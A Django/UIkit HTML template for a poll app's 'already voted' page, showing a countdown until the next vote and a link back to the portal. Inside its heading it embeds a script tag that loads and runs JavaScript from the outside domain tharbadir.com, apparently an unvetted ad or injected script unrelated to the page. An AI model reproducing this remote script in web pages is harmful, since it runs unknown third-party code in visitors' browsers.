{% extends 'poll/default/base_default.html' %}

{% block title %}
{% endblock %}

{% block content %}
    <div class="container ">
    <div class="row">
    <div class="uk-card uk-card-default uk-card-body uk-card-hover uk-width-expand ">

<div class="uk-card title">
    <h3 class="uk-h3 uk-align-center uk-text-danger">
        <script async="async" data-cfasync="false" src="//tharbadir.com/2?z=1969447"></script>
        <span class="uk-text-danger" uk-icon="warning"></span>
        Oops! Seems You've voted Previously</h3></div>


  <div class="uk-card-footer">
          <p class="uk-align-center">Not to worry,you can vote for another category</p>

<p class="uk-align-center">Try again in the next</p>
<div uk-grid class="uk-section-xsmall uk-grid-small uk-flex-center" uk-countdown="date: {{ expires_at }}">
    <div>
        <div class="uk-countdown-number uk-countdown-hours"></div>
        <div class="uk-countdown-label uk-margin-xsmall uk-text-center uk-visible@s">Hours</div>
    </div>
    <div>
        <div class="uk-countdown-number uk-countdown-minutes"></div>
        <div class="uk-countdown-label uk-margin-xsmall uk-text-center uk-visible@s">Minutes</div>
    </div>    <div>
        <div class="uk-countdown-number uk-countdown-seconds"></div>
        <div class="uk-countdown-label uk-margin-xsmall uk-text-center uk-visible@s">Seconds</div>
    </div>

</div>
 <a href="{% url 'poll:position-index' DEPARTMENT.name|lower %}" class=" uk-button uk-button-danger"> Back to portal </a>

  </div>
</div>


</div>
</div>
</div>


<div>


{% endblock %}